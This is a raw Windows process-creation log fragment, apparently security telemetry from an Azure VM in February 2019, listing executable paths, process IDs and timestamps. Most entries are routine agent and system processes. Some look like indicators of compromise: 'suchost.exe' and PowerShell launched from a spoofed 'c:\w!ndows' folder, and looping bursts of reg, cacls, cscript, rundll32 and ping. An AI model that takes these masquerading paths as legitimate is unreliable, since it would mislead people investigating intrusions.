13:15:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x16c02019-02-10 13:15:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xf602019-02-10 13:45:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x134c2019-02-10 13:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x154c2019-02-10 13:48:32.323000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x12382019-02-10 13:48:32.333000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xc602019-02-10 14:05:36.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x13c02019-02-10 14:05:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x6382019-02-10 14:15:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x115c2019-02-10 14:15:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15fc2019-02-10 14:45:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x16a82019-02-10 14:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x1d382019-02-10 14:48:32.337000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x6842019-02-10 14:48:32.347000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x17b02019-02-10 14:55:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x13302019-02-10 14:55:36.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x17d02019-02-10 15:15:36.273000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1ff82019-02-10 15:15:36.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x1fd02019-02-10 15:45:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xf802019-02-10 15:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x21202019-02-10 15:45:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x239c2019-02-10 15:45:36.270000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x15702019-02-10 00:45:28.263000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x16002019-02-10 00:45:28.490000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe0x17f02019-02-10 00:45:29.077000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe0x11ec2019-02-10 00:45:30.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe0xa982019-02-10 00:45:31.260000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x6282019-02-10 00:45:32.330000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe0x1d402019-02-10 00:45:33.173000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0xbe42019-02-10 01:15:13.177000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x16402019-02-10 02:16:01.743000\",\"c:\\\\windows\\\\system32\\\\installagent.exe0x16e02019-02-10 02:37:21.880000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x13a82019-02-10 03:16:50.323000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x7f82019-02-10 04:17:37.760000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x16bc2019-02-10 05:18:26.910000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x1b742019-02-10 06:19:15.563000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x10942019-02-10 08:20:53.907000\",\"c:\\\\windows\\\\system32\\\\installagent.exe0xb42019-02-10 09:07:02.893000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x5a82019-02-10 09:21:42.453000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0xc4c2019-02-09 20:35:53.157000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x20642019-02-09 22:12:25.910000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x1f202019-02-09 22:12:36.240000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0xefc2019-02-10 10:22:30.507000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x19ac2019-02-10 11:23:18.607000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x10042019-02-10 12:24:07.077000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x212c2019-02-09 22:35:53.157000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x12082019-02-10 13:24:54.533000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x3f82019-02-10 14:25:43.080000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe0x21782019-02-10 15:26:31.813000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x7981970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14ec2019-02-09 20:05:31.010000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x48c2019-02-09 20:05:31.020000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x4902019-02-09 23:26:47.740000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13602019-02-09 23:26:47.923000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe502019-02-09 23:26:47.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17482019-02-09 23:26:47.950000\",\"c:\\\\w!ndows\\\\system32\\\\suchost.exe0x15842019-02-09 23:26:48.073000\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe0x12bc2019-02-09 23:26:48.093000\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe0x12602019-02-09 23:26:48.107000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23482019-02-09 23:26:48.120000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x14882019-02-09 23:28:02.250000\",\"c:\\\\windows\\\\system32\\\\speech_onecore\\\\common\\\\speechmodeldownload.exe0x1e3c2019-02-10 00:00:00.770000\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe0x19282019-02-10 00:00:00.800000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x9ac2019-02-10 00:28:02.250000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x23782019-02-09 21:28:02.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x4b82019-02-10 00:44:47.253000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ca42019-02-10 00:44:47.433000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a442019-02-10 00:44:47.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19842019-02-10 00:44:47.463000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x10042019-02-10 00:44:54.540000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19402019-02-10 00:44:54.557000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x8542019-02-10 00:45:10.707000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd6c2019-02-10 00:45:10.730000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd742019-02-10 00:45:10.743000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x12482019-02-10 00:45:11.300000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x22282019-02-10 00:45:11.340000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x13482019-02-10 00:45:11.390000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1f602019-02-10 00:45:11.440000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x17b02019-02-10 00:45:11.490000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x5182019-02-10 00:45:11.540000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x4942019-02-10 00:45:11.590000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x15842019-02-10 00:45:11.640000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8c02019-02-10 00:45:11.690000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xde42019-02-10 00:45:11.763000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x23682019-02-10 00:45:12.290000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21f82019-02-10 00:45:12.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x38c2019-02-10 00:45:12.727000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xc4c2019-02-10 00:45:12.747000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xc982019-02-10 00:45:25.893000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8c42019-02-10 00:45:25.910000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x16e02019-02-10 00:45:40.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6842019-02-10 00:45:40.470000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x13982019-02-10 00:45:53.590000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xeac2019-02-10 00:45:53.627000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x3942019-02-10 00:46:06.780000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1f602019-02-10 00:46:06.810000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x19042019-02-10 00:46:19.930000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x16142019-02-10 00:46:19.950000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8342019-02-10 00:46:33.137000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xf3c2019-02-10 00:46:33.167000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x23882019-02-10 00:46:46.277000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xe102019-02-10 00:46:46.293000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x16d42019-02-10 00:46:59.423000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xbe42019-02-10 00:46:59.450000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x12802019-02-10 00:47:12.563000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x14ec2019-02-10 00:47:12.593000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x22c02019-02-10 00:47:25.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1b642019-02-10 00:47:25.740000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x20802019-02-10 00:47:38.850000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23ec2019-02-10 00:47:38.887000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x10a82019-02-10 00:47:52.007000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x4902019-02-10 00:47:52.020000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x203c2019-02-10 00:48:05.117000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21b02019-02-10 00:48:05.143000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xb002019-02-10 00:48:18.287000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1d382019-02-10 00:48:18.353000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xfcc2019-02-10 00:48:18.367000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x21c82019-02-10 00:48:18.387000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x94c2019-02-10 00:48:18.443000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x7fc2019-02-10 00:48:37.320000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8f82019-02-10 00:48:37.347000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x12502019-02-10 00:48:59.900000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1c842019-02-10 00:48:59.923000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1d342019-02-10 00:49:13.023000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17042019-02-10 00:49:13.053000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x21d42019-02-10 00:49:30.207000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8342019-02-10 00:49:30.227000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1fd02019-02-10 00:49:57.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xcc82019-02-10 00:49:57.533000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xb482019-02-10 00:50:10.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18342019-02-10 00:50:10.677000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x21642019-02-10 00:50:26.817000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19c82019-02-10 00:50:26.837000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x20802019-02-10 00:50:52.073000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ed42019-02-10 00:50:52.440000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x20082019-02-10 00:50:52.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10402019-02-10 00:50:52.467000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xd802019-02-10 00:51:17.663000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19a82019-02-10 00:51:17.687000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x17d82019-02-10 00:51:42.923000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21c82019-02-10 00:51:43.013000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1be02019-02-10 00:52:08.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xccc2019-02-10 00:52:09.227000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17a42019-02-10 00:52:09.243000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x19842019-02-10 00:52:09.277000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x1ca42019-02-10 00:52:09.290000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1a442019-02-10 00:52:09.307000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x7fc2019-02-10 00:52:09.357000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x1b102019-02-10 00:52:09.383000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xe042019-02-10 00:52:09.403000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x12f82019-02-10 00:52:09.427000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x21702019-02-10 00:52:09.440000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1bc02019-02-10 00:52:09.460000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xa242019-02-10 00:52:09.487000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x22a82019-02-10 00:52:09.503000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x3942019-02-10 00:52:09.547000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x8f82019-02-10 00:52:09.557000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x12502019-02-10 00:52:09.607000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23642019-02-10 00:52:09.663000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x9ec2019-02-10 00:52:34.923000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12602019-02-10 00:52:34.963000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xe082019-02-10 00:53:00.197000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23d42019-02-10 00:53:00.220000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xb42019-02-10 00:53:25.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12782019-02-10 00:53:25.473000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x53c2019-02-10 00:53:50.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x9742019-02-10 00:53:50.740000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x17202019-02-10 00:54:15.967000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1fc02019-02-10 00:54:15.990000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1af02019-02-10 00:54:41.217000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1ea02019-02-10 00:54:41.247000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x18502019-02-10 00:55:06.503000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x11f02019-02-10 00:55:06.520000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x19282019-02-10 00:55:31.747000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c202019-02-10 00:55:32.707000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d082019-02-10 00:55:32.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xed42019-02-10 00:55:32.740000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xe502019-02-10 00:55:57.930000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6842019-02-10 00:55:57.947000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xf582019-02-10 00:56:23.183000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13e02019-02-10 00:56:23.203000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xcc02019-02-10 00:56:48.420000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x3c42019-02-10 00:56:48.490000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x19142019-02-10 00:57:13.700000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xc142019-02-10 00:57:13.730000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xe602019-02-10 00:57:38.920000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19902019-02-10 00:57:38.940000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x14202019-02-10 00:58:04.147000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1d902019-02-10 00:58:04.180000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x15c82019-02-10 00:58:29.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xfcc2019-02-10 00:58:29.463000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x17a82019-02-10 00:58:54.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x212c2019-02-10 00:58:54.673000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8c42019-02-10 00:59:19.897000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1c242019-02-10 00:59:19.930000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x12502019-02-10 00:59:45.177000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1d9c2019-02-10 00:59:45.200000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xc4c2019-02-10 01:00:10.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6482019-02-10 01:00:10.500000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x12e02019-02-10 01:00:35.720000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xbe42019-02-10 01:00:35.747000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xc1c2019-02-10 01:01:01.007000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x203c2019-02-10 01:01:01.030000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1e8c2019-02-10 01:01:26.257000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xc802019-02-10 01:01:26.323000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x10802019-02-10 01:01:51.563000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1e442019-02-10 01:01:51.587000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x18042019-02-10 01:02:16.817000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1e302019-02-10 01:02:16.843000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xd742019-02-10 01:02:42.083000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x162c2019-02-10 01:02:42.147000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xcec2019-02-10 01:03:10.360000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10d02019-02-10 01:03:10.380000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1d542019-02-10 01:03:17.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23d42019-02-10 01:03:17.473000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x12c42019-02-10 01:03:35.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x18682019-02-09 21:44:46.750000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x5942019-02-09 21:44:46.923000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x20802019-02-09 21:44:46.937000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23e82019-02-09 21:44:46.950000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xc682019-02-09 21:44:52.010000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x67c2019-02-09 21:44:52.027000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xf802019-02-09 21:56:28.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xd982019-02-09 21:56:28.403000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6c02019-02-09 21:56:28.413000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17d82019-02-09 21:56:28.427000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xdb02019-02-09 21:56:35.493000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x7702019-02-09 21:56:35.510000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xfcc2019-02-09 21:56:43.593000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17142019-02-09 21:56:43.613000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd602019-02-09 21:56:45.653000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xf082019-02-09 21:56:46.590000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x22a82019-02-09 21:56:46.607000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x5942019-02-09 21:56:46.623000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x11cc2019-02-09 21:56:46.640000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x8502019-02-09 21:56:46.667000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x23842019-02-09 21:56:46.677000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xda42019-02-09 21:56:46.690000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1e442019-02-09 21:56:46.700000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x17702019-02-09 21:56:46.713000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x12cc2019-02-09 21:56:46.740000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xbd02019-02-09 21:56:46.753000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x67c2019-02-09 21:56:46.767000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1b502019-02-09 21:56:46.780000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xfd42019-02-09 21:56:46.793000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x16e02019-02-09 21:56:46.840000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8c42019-02-09 21:56:56.933000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1ac42019-02-09 21:56:56.957000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x22782019-02-09 21:57:25.140000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x154c2019-02-09 21:57:25.160000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12bc2019-02-09 22:02:05.287000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x17342019-02-09 22:02:26.477000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x123c2019-02-09 22:02:26.493000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x5502019-02-09 22:02:27.520000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x16802019-02-09 22:02:27.543000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xc982019-02-09 22:02:28.570000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x16fc2019-02-09 20:28:02.213000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x5ac2019-02-10 01:28:02.250000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe0x17702019-02-10 01:48:41.643000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x21f42019-02-10 01:48:41.673000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0xfe02019-02-10 02:28:02.243000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe0x17ac2019-02-10 02:37:21.853000\",\"c:\\\\windows\\\\system32\\\\apphostregistrationverifier.exe0x1e682019-02-10 03:00:00.720000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe0x53c2019-02-10 03:06:45.883000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x107c2019-02-10 03:06:45.900000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x19342019-02-10 03:28:02.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xfbc2019-02-10 03:44:47.260000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x2d02019-02-10 03:44:47.453000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x5c2019-02-10 03:44:47.470000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23a42019-02-10 03:44:47.487000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x11f02019-02-10 03:44:57.607000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb002019-02-10 03:44:57.623000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xb482019-02-10 03:45:14.760000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20682019-02-10 03:45:14.783000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x16e82019-02-10 03:45:32.930000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe602019-02-10 03:45:33.873000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1fe82019-02-10 03:45:33.890000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x107c2019-02-10 03:45:33.920000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x9f02019-02-10 03:45:33.937000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x9742019-02-10 03:45:33.967000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x23782019-02-10 03:45:34.187000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x10042019-02-10 03:45:34.213000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8482019-02-10 03:45:34.233000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x162c2019-02-10 